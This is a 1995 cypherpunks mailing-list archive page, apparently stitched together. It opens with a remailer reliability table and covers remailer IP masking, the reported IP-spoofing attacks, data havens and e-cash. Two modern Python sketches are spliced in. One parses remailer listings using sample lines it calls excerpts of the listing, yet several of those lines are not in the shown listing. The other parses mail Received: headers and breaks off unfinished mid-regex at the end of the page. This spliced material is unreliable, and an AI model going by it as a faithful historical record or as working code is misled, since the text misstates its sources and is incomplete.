rahul    homer@rahul.net                  ****#-** *-#    31:58  96.61%
bsu-cs   nowhere@bsu-cs.bsu.edu           ***+#-#* *+*     7:18  96.59%
ideath   remailer@ideath.goldenbear.com   --+---+- ---  1:57:47  96.59%
alumni   hal@alumni.caltech.edu           ++-*#+-- **#    40:31  96.47%
extropia remail@extropia.wimsey.com       ++++++.. +++  5:46:02  96.10%
soda     remailer@csua.berkeley.edu       -..-.._. .    8:44:34  96.08%
portal   hfinney@shell.portal.com         ##- ***- **#    20:48  95.82%
mix      mixmaster@nately.ucsd.edu        +++++--+  ++  1:01:24  95.72%
nately   remailer@nately.ucsd.edu         ++++++-+  ++    48:18  95.72%
q        q@c2.org                         +++--+-- +    1:41:44  95.06%
usura    usura@replay.com                 -  +--+- -**    39:18  93.78%
xs4all   remailer@xs4all.nl               -  *-+++ -**    27:43  92.93%
myriad   remailer@myriad.pc.cc.cmu.edu             ***     4:16  87.80%
vox      remail@vox.xs4all.nl             -- -     --   9:08:07  84.62%
c2       remail@c2.org                     _         + 26:06:32  75.08%
flame    tomaz@flame.sinet.org                   _  -+  9:15:23  34.58%
desert   remail@desert.xs4all.nl          .--____      62:05:22  29.80%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   Options and features

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.

   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.

   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.

   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.

   oldpgp
          Remailer does not like messages encoded with MIT PGP 2.6. Other
          versions of PGP, including 2.3a and 2.6ui, work fine.

   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.

   ksub
          Remailer always kills subject header, even in non-pgp mode.

   nsub
          Remailer always preserves subject header, even in pgp mode.

   latent
          Supports Matt Ghio's Latent-Time: option.

   cut
          Supports Matt Ghio's Cutmarks: option.

   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   special
          Accepts only pgp encrypted messages.

   ek
          Encrypt responses in reply blocks using Encrypt-Key:
          header.


Raph Levien
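
As an added illustration (not code from this post and not premail's own), the sketch below parses both parts of the listing above and picks remailers the way a chaining client might. The function and class names are this example's own, the sample lines are excerpted from the listing, and the selection thresholds (95% uptime, 4 hours latency) are arbitrary assumptions.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Destination header per remailer class, from "Options and features" above.
CLASS_HEADER = {"cpunk": "Request-Remailing-To",
                "eric": "Anon-Send-To",
                "penet": "X-Anon-To"}

CONFIG_RE = re.compile(r'^\$remailer\{"([^"]+)"\}\s*=\s*"<([^>]+)>\s*([^"]*)";\s*$')

# Lines excerpted from the listing in the post (first and second part).
CONFIG = '''
$remailer{"vox"} = "<remail@vox.xs4all.nl> cpunk pgp. post";
$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"usura"} = "<usura@replay.com> cpunk pgp. hash latent cut post";
catalyst@netcom.com is _not_ a remailer.
'''
TABLE = '''
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
penet    anon@anon.penet.fi               *******+****    33:13  99.99%
bsu-cs   nowhere@bsu-cs.bsu.edu           ***+#-#* *+*     7:18  96.59%
alumni   hal@alumni.caltech.edu           ++-*#+-- **#    40:31  96.47%
extropia remail@extropia.wimsey.com       ++++++.. +++  5:46:02  96.10%
portal   hfinney@shell.portal.com         ##- ***- **#    20:48  95.82%
usura    usura@replay.com                 -  +--+- -**    39:18  93.78%
vox      remail@vox.xs4all.nl             -- -     --   9:08:07  84.62%
c2       remail@c2.org                     _         + 26:06:32  75.08%
'''

@dataclass
class Remailer:
    name: str
    address: str
    options: set
    pgp_key_id: Optional[str] = None   # what to encrypt to, if pgp is supported
    history: str = ""
    latency_s: Optional[int] = None
    uptime: Optional[float] = None

def parse_config(text):
    """Parse the $remailer{...} lines; anything else (e.g. '_not_ a remailer') is skipped."""
    remailers = {}
    for line in text.splitlines():
        m = CONFIG_RE.match(line.strip())
        if not m:
            continue
        name, address, opts = m.groups()
        options = set(opts.split())
        key_id = None
        if "pgp." in options:          # trailing period: short name is the key ID
            options.discard("pgp.")
            options.add("pgp")
            key_id = name
        elif "pgp" in options:         # otherwise the full address is the key ID
            key_id = address
        remailers[name] = Remailer(name, address, options, key_id)
    return remailers

def parse_latency(text):
    """'4:59' is mm:ss, '18:00:23' is h:mm:ss; return seconds."""
    secs = 0
    for part in text.split(":"):
        secs = secs * 60 + int(part)
    return secs

def merge_stats(remailers, table):
    """Attach history/latency/uptime. The history column contains spaces,
    so the two right-hand columns are split off first."""
    for line in table.splitlines():
        parts = line.rsplit(None, 2)
        if len(parts) != 3 or not parts[2].endswith("%"):
            continue                   # header, rule or blank line
        head = parts[0].split(None, 2)
        r = remailers.get(head[0]) if len(head) >= 2 else None
        if r is None or r.address != head[1]:
            continue                   # unknown name or address mismatch
        r.history = head[2] if len(head) == 3 else ""
        r.latency_s = parse_latency(parts[1])
        r.uptime = float(parts[2].rstrip("%"))
    return remailers

def destination_header(r):
    """Header field this remailer expects for the next hop."""
    for cls, header in CLASS_HEADER.items():
        if cls in r.options:
            return header
    return None

def select(remailers, require=frozenset({"pgp"}), min_uptime=95.0, max_latency_s=4 * 3600):
    """Remailers that have stats, support every required option and meet the
    thresholds, best uptime first."""
    ok = [r for r in remailers.values()
          if r.uptime is not None and require <= r.options
          and r.uptime >= min_uptime and r.latency_s <= max_latency_s]
    return sorted(ok, key=lambda r: (-r.uptime, r.latency_s))

def load_sample():
    return merge_stats(parse_config(CONFIG), TABLE)

if __name__ == "__main__":
    for r in select(load_sample()):
        print(r.name, r.address, destination_header(r), r.pgp_key_id, r.uptime)
```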




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Mon, 23 Jan 95 06:58:51 PST
To: remailer-operators@c2.org
Subject: Re: jpunix.com and MX'ing
In-Reply-To: <199501211728.LAA04757@jpunix.com>
Message-ID: <199501231457.GAA16462@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: "John A. Perry" <perry@jpunix.com>

   > A question, from an internet mail novice:  How does the 'invisible'
   > remailer advertise itself as its 'visible' name in its outgoing
   > mail?  

Perhaps the easiest thing to do is to add a Received: field to all
outgoing remailed mail so that it appears that the visible site is
handling the invisible site as if it were UUCP or a firewall or
mailhub or something.  Since anybody who really wants to find out who
actually owns the machine is going to, you might as well indicate the
real relation up front, namely, that the owner of the visible machine
routes mail for the invisible one.  In other words, there would be two
Received: fields in outgoing remailed mail.  The first (lower, later
in the stream) Received: field would be generated by the remailer
software.  The second would be added by the system sendmail.
It will be tricky to make this look just right.

Another way to mask this is to give the remailer its own IP address.
It's easy to recompile extra slip interfaces into a kernel; each gets
its own IP address.  Routing the output of the remailer through these
extra interfaces can require some hackery, though.  I only know about
this second hand, but evidently the BSDI 1.1 release added some BSD
4.4 feature that makes this kind of IP hack much easier.  

With an extra IP address, you then register a full suite of domain
names just like normal.  This could be a new second-level domain or a
subdomain of, say, techwood.org.  You'll want SOA, A, MX, and PTR
records.  The NS entry for the relevant domains (esp. PTR records)
will generally reveal the computer/network operator, but again, this
is a technical relationship only.  What you have done is pretty
completely separated the technical infrastructure from the remailer
operation.

What we're creating here, of course, is virtual machines.  Unix
kernels have supported multiple processes and multiple users for a
long time.  I expect multiple virtual machines this decade.

   The MX record idea was not 
   meant to totally hide a remailer. It was meant to act as a "casual" 
   mask for the remailer.

And I think this mask is quite good.  It's generally a good idea to
try the easier-to-deploy solutions first and see if they work.  All
the IP spoofing above takes a bit of work to do.  Just using an MX
record and getting a second postmaster address is clearly the first
thing to do.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 23 Jan 95 04:12:08 PST
To: bal@martigny.ai.mit.edu
Subject: Re: Markoff/NYT on IP spoofing
In-Reply-To: <9501230617.AA20253@toad.com>
Message-ID: <9501231210.AA10875@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



"Brian A. LaMacchia" says:
> John Markoff writes in Monday's New York Times about a rash of computer
> security breaches using IP spoofing to penetrate routers and firewalls.
> That's all the technical info I could glean from the story; CERT is
> supposed to "make an announcement" later today and tell us what brands
> of routers can and cannot be modified to defend against this type of
> attack. 

The attack is far worse than described in the Times. Markoff didn't
quite understand the full ramifications, or perhaps people weren't
telling him the full story. It's *NOT* just IP spoofing.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@hawksbill.sprintmrn.com (Paul Ferguson)
Date: Mon, 23 Jan 95 04:25:43 PST
To: perry@imsi.com
Subject: Re: Markoff/NYT on IP spoofing
In-Reply-To: <9501231210.AA10875@snark.imsi.com>
Message-ID: <9501231225.AA07367@hawksbill.sprintmrn.com>
MIME-Version: 1.0
Content-Type: text



> 
> 
> "Brian A. LaMacchia" says:
> > John Markoff writes in Monday's New York Times about a rash of computer
> > security breaches using IP spoofing to penetrate routers and firewalls.
> > That's all the technical info I could glean from the story; CERT is
> > supposed to "make an announcement" later today and tell us what brands
> > of routers can and cannot be modified to defend against this type of
> > attack. 
> 
> The attack is far worse than described in the Times. Markoff didn't
> quite understand the full ramifications, or perhaps people weren't
> telling him the full story. It's *NOT* just IP spoofing.
> 
>

Perry, pray tell, what else was John alluding to?

- paul

 
_______________________________________________________________________________
Paul Ferguson                         
US Sprint                                          tel: 703.689.6828
Managed Network Engineering                   internet: paul@hawk.sprintmrn.com
Reston, Virginia  USA                             http://www.sprintmrn.com 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 23 Jan 95 04:30:28 PST
To: paul@hawksbill.sprintmrn.com (Paul Ferguson)
Subject: Re: Markoff/NYT on IP spoofing
In-Reply-To: <9501231225.AA07367@hawksbill.sprintmrn.com>
Message-ID: <9501231230.AA10926@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Paul Ferguson says:
> > The attack is far worse than described in the Times. Markoff didn't
> > quite understand the full ramifications, or perhaps people weren't
> > telling him the full story. It's *NOT* just IP spoofing.
> 
> Perry, pray tell, what else was John alluding to?

I'm still trying to clear with my sources who told me in confidence
what I can and can't say now that the article is out. However, the
problem was documented by Bellovin some years ago.


Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@hawksbill.sprintmrn.com (Paul Ferguson)
Date: Mon, 23 Jan 95 04:33:51 PST
To: perry@imsi.com
Subject: Re: Markoff/NYT on IP spoofing
In-Reply-To: <9501231230.AA10926@snark.imsi.com>
Message-ID: <9501231233.AA07438@hawksbill.sprintmrn.com>
MIME-Version: 1.0
Content-Type: text



> > 
> > Perry, pray tell, what else was John alluding to?
> 
> I'm still trying to clear with my sources who told me in confidence
> what I can and can't say now that the article is out. However, the
> problem was documented by Bellovin some years ago.
> 
> 

Hmm. This could indeed be something of concern, since it demonstrates
that someone is taking great pains to take advantage of the shortcomings
of the IP protocol, if I recall smb's paper content. I'll have to dig
that one out when I get into the office this morning...

- paul

- --
_______________________________________________________________________________
Paul Ferguson                         
US Sprint                                          tel: 703.689.6828
Managed Network Engineering                   internet: paul@hawk.sprintmrn.com
Reston, Virginia  USA                             http://www.sprintmrn.com 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strick -- henry strickland <strick@versant.com>
Date: Mon, 23 Jan 95 08:00:33 PST
To: bart@netcom.com (Harry Bartholomew)
Subject: Re: Call Security (Was: Re: TJOAUC 1-7)
In-Reply-To: <199501231133.DAA14851@netcom15.netcom.com>
Message-ID: <9501231603.AA22524@versant.com>
MIME-Version: 1.0
Content-Type: text/plain


# > 
# > 	This guy showed up in sci.crypt back in November of '94, with the 
# > "Call Security" program. It had some new unknown public-key algorithm in 
# > it that he had designed himself.
# 
# 
#     and on the next page:
#     "8. Is it really secure? You, decide!

okay, I've decided!    --strick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Mon, 23 Jan 95 08:15:05 PST
To: cypherpunks@toad.com
Subject: Writer Sets Sights on Net
Message-ID: <199501231613.IAA22198@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I noticed the following solicitation mini-spamming its way into
a number of newsgroups yesterday.  Looks like yet another person
plans a lurid expose of online services, BBS systems, and the Net.

------

From: FMGG44A@prodigy.com (Jerome Haden)
Subject: Writer Seeks On-Line Crime Info

REQUEST FOR INFORMATION

I am currently writing a book length manuscript entitled :

"Crash and Burn:
A Parents Guide To The Dangers On The Information SuperHighway."

I am seeking real events that are "public record" either
newspaper articles or court documents which involve the following
criminal activity:

1.) Sexual predators who have committed sex crimes on minors with
a connection to a local computer bulletin board or a national
on-line service such as Prodigy, Compuserve, or America On Line.

2.) Teenage computer hackers who have been charged with any type
of telephone fraud, unauthorized access to another computer, or
similar crimes.

3.) Any teenagers involved in making explosives with information
obtained from a computer bulletin board.

4.) Any selling of illegal drugs involving minors on a computer
bulletin board.

5.) Any other crimes involving teenagers as either victims or
perpetrators with the use of modems or any manner in
"cyberspace".

Any information must be a public record that can be verified by
my literary agency and my publisher.

Also would be interested in hearing from victims or perpetrators
willing to be interviewed "off the record", and/or willing to
appear on national talk shows.

If you have any such information please contact me as follows:

Jerome Haden
E-Mail: FMGG44A@prodigy.com

-- 
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Mon, 23 Jan 95 05:39:06 PST
To: Censored Girls Anonymous <carolb@barton.spring.com>
Subject: Re: Why emoney? Why not a web of debt?
In-Reply-To: <Pine.3.89.9501220904.B11359-0100000@barton.spring.com>
Message-ID: <9501231337.AA14968@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Sun, 22 Jan 1995 09:46:26 -0600 (CST)
    From: Censored Girls Anonymous <carolb@barton.spring.com>
    
    Many companies are already founded on "a web of debt".
    "Sallie Mae (Student Loans), Ginnie Mae (General Loans), and Freddie Mac
    (Real Estate Loans)," all come to mind at the moment. They're nicely
    formatted, processed and make even more money for investors as the
    interest rates change.

Student Loans (at least GSLs) and GNMA loans are backed by ``the full
faith and credit'' of the US federal government.  As far as an
investor is concerned, loan default looks the same as if the loanee
paid their debt off early.  The `web of debt' suggestion posted here
doesn't seem to follow the same model unless you count virtually every
form of financial transaction -- including buying a cup of coffee with
a dollar bill -- as fitting the model.

As a side note, GNMA (Ginnie Mae) is not for `general loans', but
rather VA and FHA primary residence mortgages with various
restrictions.  GNMA, FNMA (Fannie Mae), and FHLMC (Freddie Mac) all
exist to provide secondary markets for various kinds of real estate
debt.

--
Rick Busdiecker <rfb@lehman.com>      Please do not send electronic junk mail!
  Lehman Brothers Inc.
  3 World Financial Center  "The more laws and order are made prominent, the
  New York, NY  10285-1100   more thieves and robbers there will be." --Lao Tzu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 23 Jan 95 07:18:26 PST
To: cypherpunks@toad.com
Subject: Re: jpunix.com and MX'ing
In-Reply-To: <199501231457.GAA16462@largo.remailer.net>
Message-ID: <9501231517.AA11231@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Hughes says:
> Another way to mask this is to give the remailer its own IP address.
> It's easy to recompile extra slip interfaces into a kernel; each gets
> its own IP address.  Routing the output of the remailer through these
> extra interfaces can require some hackery, though.  I only know about
> this second hand, but evidently the BSDI 1.1 release added some BSD
> 4.4 feature that makes this kind of IP hack much easier.  

In 4.4 kernels, you just configure an alias address.

For, say, SunOS 4.1.X, John Ioannidis released a virtual interface
driver; I saw the thing posted to the net recently so I suppose it's
public now (though I'm not sure J.I. knew that was going to happen.)
It's not hard to set such things up; no real trickery needed.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Claborne, Chris" <claborne@microcosm.sandiegoca.ATTGIS.COM>
Date: Mon, 23 Jan 95 16:24:08 PST
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: "Internetpol"
Message-ID: <2F2402AA@microcosm.SanDiegoCA.ATTGIS.COM>
MIME-Version: 1.0
Content-Type: text/plain



>Timothy C. May says:
>> Seriously, there is considerable danger that the growing chorus of
>> alarmist nonsense about the Net being used for child porn, for snuff
>> films, for weapons secrets deals, etc., will result in the U.S.
>> Net.Cops linking up with their European and Asian associates.

If the net is dangerous, what about the phone system.  All phones
should be disconnected immediately!  These people need a reality
check.  I'm tired of society do-gooders trying to protect me from myself.

                                        ...  __o
                                       ..   -\<,
Chris.Claborne@SanDiegoca.ATTGIS.Com   ...(*)/(*).          CI$: 76340.2422
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.
PGP-encrypted e-mail welcome!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Mon, 23 Jan 95 11:46:39 PST
To: cypherpunks@toad.com
Subject: Re: jpunix.com and MX'ing
In-Reply-To: <9501231517.AA11231@snark.imsi.com>
Message-ID: <199501231945.LAA19843@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: "Perry E. Metzger" <perry@imsi.com>

   In 4.4 kernels, you just configure an alias address.

What is the mechanism by which a particular process picks an outgoing
IP address?

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <MFROOMKI@umiami.ir.miami.edu>
Date: Mon, 23 Jan 95 09:05:54 PST
To: Rick Busdiecker <rfb@lehman.com>
Subject: Re: Why emoney? Why not a web of debt?
In-Reply-To: <9501231337.AA14968@cfdevx1.lehman.com>
Message-ID: <Pine.3.89.9501231119.A585123998-0100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Sallie Mae's commercial paper is NOT backed by the full 
faith and credit of the US government.  They carry a specific disclaimer 
to that effect.  It is true that many personal student loans (GSLs) from 
banks are guaranteed by the government.  The system was recently reformed 
to remove the riskless subsidy to Sallie Mae, which is 100% privately 
owned, and very profitable.

Similarly Fannie Mae and all other privately held GSE's are only backed 
by an "implicit" federal guarantee.  Although the only time one of these 
got into trouble the feds did bail it out.

See my forthcoming article "Reinventing Government Corporations" in the 
Illinois Law Review.  Due out in about three months.

OBCrypto: How big a risk premium would YOU want to lend to an anonymous
borrower?  In practice, for the foreseeable future any such lending will
almost certainly be intermediated through a very small number (near zero)
of specialists ready, willing and able to measure and minimize the risks. 
Or there will be ferocious requirements for collateral. 

A.Michael Froomkin          | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
U.Miami Law School          | MFROOMKI@UMIAMI.IR.MIAMI.EDU
PO Box 248087               | 
Coral Gables, FL 33146 USA  | It's warmish here.

On Mon, 23 Jan 1995, Rick Busdiecker wrote:
[...]
> Student Loans (at least GSLs) and GNMA loans are backed by ``the full
> faith and credit'' of the US federal government.  As far as an
> investor is concerned, loan default looks the same as if the loanee
> paid their debt off early.  The `web of debt' suggestion posted here
> doesn't seem to follow the same model unless you count virtually every
> form of financial transaction -- including buying a cup of coffee with
> a dollar bill -- as fitting the model.
> 
> As a side note, GNMA (Ginnie Mae) is not for `general loans', but
> rather VA and FHA primary residence mortgages with various
> restrictions.  GNMA, FNMA (Fannie Mae), and FHLMC (Freddie Mac) all
> exist to provide secondary markets for various kinds of real estate
> debt.
[...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 23 Jan 95 09:14:16 PST
To: cypherpunks@toad.com
Subject: NYT on Net Threat
Message-ID: <199501231713.MAA20366@pipe2.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Toad is choking on a try 3 hours ago to send today's Markoff article on the
new Net security threat Brian and others noted. 
 
Nail-biters can get it by email (if this passes the gory hole). 
 
Send blank message with subject:  NEW_hak




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 23 Jan 95 09:23:13 PST
To: cypherpunks@toad.com
Subject: Perry E. Metzger: I would suggest...
Message-ID: <9501231722.AA11670@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



------- Forwarded Message

Date: Mon, 23 Jan 95 10:54:16 EST
From: perry@imsi.com (Perry E. Metzger)
Message-Id: <9501231554.AA28483@webster.imsi.com>
To: bugtraq@fc.net
Subject: I would suggest...

I would suggest that people interested in the threat described in this
morning's times find a copy for themselves of Steve Bellovin's classic
paper "Security Problems in the TCP/IP Protocol Suite." It is
available from

ftp://research.att.com/dist/internet_security/ipext.ps.Z

People may also want to examine

ftp://research.att.com/dist/internet_security/117.ps.Z

Perry

------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Mon, 23 Jan 95 14:25:39 PST
To: tcmay@netcom.com
Subject: Re: The Remailer Crisis
Message-ID: <9501232220.AA18684@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim writes:
> One thing I should've noted is that a Linux-based cheap remailer is
> mostly useless without a "live connection" to the Net. 

I disagree - live connections  are great for fast-response systems,
but we got along just fine in the uucp dialup world with occasional
connections; in an environment like remailers where you _want_
batchy performance, the clunkiness can even be a "feature".

I don't know how many providers are offering uucp or ip dialout
from their servers, or whether they're much cheaper than real ip,
but you can do ok with, say, hourly polling to a TIA or term connection
to fill your mailbox from a POP server, or nightly if that's enough.

TIA also has the advantage over SLIP/PPP that outgoing mail from your 
system will _always_ have unverifiable IP addresses - you look like
netcom.com, just like everyone else TIA-connecting from netcom does.
And connections from shared-IP-address-pool systems like netcruiser
or dialup PPP systems probably don't do much logging of who's used
what IP address beyond when nameserver caches clear.

		Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Mon, 23 Jan 95 14:26:36 PST
To: eric@remailer.net
Subject: Re: Data Vaults (vs. Data Havens)
Message-ID: <9501232223.AA18759@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim and Eric write things like:
> I fully concur.  The connotations of the word "haven" imply activities
> that ordinary people don't see themselves doing.  This means that
> ordinary people won't generally use something called a "haven", even
> if they might use exactly the same service called something else.

We can always call them "Private Storage Servers" or some such;
an interesting question is whether the main uses will be
for retrieval by the storer, or by someone else, or by a bunch of others,
and how we describe the service may affect that.
		Bill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@jpunix.com>
Date: Mon, 23 Jan 95 12:26:44 PST
To: perry@imsi.com
Subject: Re: jpunix.com and MX'ing
In-Reply-To: <9501231956.AA12009@snark.imsi.com>
Message-ID: <199501232025.OAA27601@jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <9501231956.AA12009@snark.imsi.com> you write:
>
>Eric Hughes says:
>>    From: "Perry E. Metzger" <perry@imsi.com>
>> 
>>    In 4.4 kernels, you just configure an alias address.

That's what I just did on jpunix.com. It now answers to 198.133.124.3,
the block of IP addresses that belonged to jpunix.com. (jpunix had been
using an IP address "borrowed" from work)

 John A. Perry - KG5RG - perry@jpunix.com
 WWW - http://jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.
 PGP-encrypted e-mail welcome!
 
 Finger kserver@jpunix.com for PGP keyserver help.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Mon, 23 Jan 95 14:46:15 PST
To: cypherpunks@toad.com
Subject: Re:  transient guerrilla remailers
Message-ID: <9501232242.AA19112@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Nobody@rahul.net, forwarding from homer's remailer, writes:
> If c2.org can offer RIAB accounts on a pre-paid basis, what's to
> stop people interested in the cause from paying anonymously,
> setting up the RIAB, and just walking away? When the pre-paid period
> expires, the remailer goes away. 

Yeah - John Doe pays in cash, or uses a Post Office money order :-),
to get X months of remailer service.  After the initial account setup,
he can keep it updated by mailing in mostly-anonymous paper cash using
the usually-anonymous paper remailer service offered by the US government,
dropping the payments in a mailbox.  If the sysadm is trustable, no problem,
and the degree of trust is whatever a month's remailer service costs.
If he's not, John Doe can detect it by occasionally using the remailer,
and can spam the net with scanned-in copies of the money order showing
it's payable to sysadm.  If the sysadm wants to float the (low) cost of
running a remailer for a month, he can even keep the money order around
for a month or so to use as evidence if he's subpoenaed or otherwise legally
harassed.

One concern I have about this remailer strategy is whether everyone's
remailer shows up as their own, or as "nobody" - can you tell 
the nobodies apart?
		
			John X. Doe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Mon, 23 Jan 95 14:49:51 PST
To: ben@Tux.Music.ASU.Edu
Subject: Re: AA + Anonymous ECash = Unhappy Fundies
Message-ID: <9501232247.AA19217@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


> > It strikes me that this would be the perfect way to generate
> > consumer interest in anonymous digital cash protocols [. . . .]

> The "cause" will do much better if the first major association is made
> with something much less controversial.  Girl Scout cookies, say. 

Girl Scout Cookies do crumble a bit when crammed through the net,
and it's tough to deliver them to anonymous locations, unlike bits.
And there are moral concerns there as well - not only do their 
"butter cookies" use non-butter shortening (:-), but there's the
problem that it turns the Girl Scouts into a crass commercial enterprise,
just another division of Nabisco, instead of teaching the kids that
hard work will get them a 7 percent margin on their sales.

On the other hand, being able to have Girl Scout cookies or flowers
sent by anonymous donors may go over well in some circles...

		Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Mon, 23 Jan 95 14:52:21 PST
To: cypherpunks@toad.com
Subject: Re:  hmmm, port 25
Message-ID: <9501232250.AA19265@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


nutty elf writes, from tower.stc.housing.washington.edu, the message below.
If I'd been watching recently for postings from that machine,
I could point out who he probably was.....

> From toad.com!owner-cypherpunks@ig1.att.att.com Sun Jan 22 03:18:20 1995
> Return-Path: <toad.com!owner-cypherpunks@ig1.att.att.com>
> Received: from ig1.att.att.com by anchor.ho.att.com (4.1/EMS-1.1.1 SunOS)
> 	id AA28663; Sun, 22 Jan 95 03:18:19 EST
> Received: from att!toad.com by ig1.att.att.com id AA09271; Sun, 22 Jan 95 03:20:16 EST
> Received: by gw1.att.com; Sun Jan 22 03:19:52 EST 1995
> Received: from toad.com by relay2.UU.NET with SMTP 
> 	id QQxzth02499; Sun, 22 Jan 1995 03:16:33 -0500
> Received: by toad.com id AA25129; Sun, 22 Jan 95 00:12:52 PST
> Received: from northpole.org (tower.stc.housing.washington.edu) by toad.com id AA24523; Sun, 22 Jan 95 00:10:24 PST
> Date: Sun, 22 Jan 95 00:09:36 PST
> From: nutty_elf@northpole.org
> Message-Id: <9501220810.AA24523@toad.com>
> Subject: hmmm, port 25
> To: cypherpunks@toad.com
> Sender: owner-cypherpunks@toad.com
> Precedence: bulk
> Status: RO
> 
> That's strange, that last port 25 forgery didn't behave as expected.
> Just checking it.
> 
> --nutty elf
> 
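
The Received: chain quoted above is what lets a reader trace the posting to tower.stc.housing.washington.edu even though the sender called itself northpole.org. The sketch below is an added example, not part of the original message: it parses that header block (copied from the quote) and reports the inconsistencies. The function names and the three heuristics are assumptions of this example, and the parser only handles the sendmail-era `from NAME (HOST) by HOST id QID` layout shown on this page.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Header block copied from the quoted message above (body omitted).
SAMPLE_HEADERS = (
    "Return-Path: <toad.com!owner-cypherpunks@ig1.att.att.com>\n"
    "Received: from ig1.att.att.com by anchor.ho.att.com (4.1/EMS-1.1.1 SunOS)\n"
    "\tid AA28663; Sun, 22 Jan 95 03:18:19 EST\n"
    "Received: from att!toad.com by ig1.att.att.com id AA09271; Sun, 22 Jan 95 03:20:16 EST\n"
    "Received: by gw1.att.com; Sun Jan 22 03:19:52 EST 1995\n"
    "Received: from toad.com by relay2.UU.NET with SMTP\n"
    "\tid QQxzth02499; Sun, 22 Jan 1995 03:16:33 -0500\n"
    "Received: by toad.com id AA25129; Sun, 22 Jan 95 00:12:52 PST\n"
    "Received: from northpole.org (tower.stc.housing.washington.edu) by toad.com"
    " id AA24523; Sun, 22 Jan 95 00:10:24 PST\n"
    "Date: Sun, 22 Jan 95 00:09:36 PST\n"
    "From: nutty_elf@northpole.org\n"
    "Message-Id: <9501220810.AA24523@toad.com>\n"
    "Subject: hmmm, port 25\n"
    "To: cypherpunks@toad.com\n"
    "\n"
)

# "from CLAIMED (OBSERVED) by HOST ... id QID": CLAIMED is the name the client
# announced; OBSERVED is the name the receiving host recorded for the peer.
HOP_RE = re.compile(
    r"^(?:from\s+(?P<claimed>\S+)(?:\s+\((?P<observed>[^)]*)\))?\s+)?"
    r"by\s+(?P<by>[^\s;]+)"
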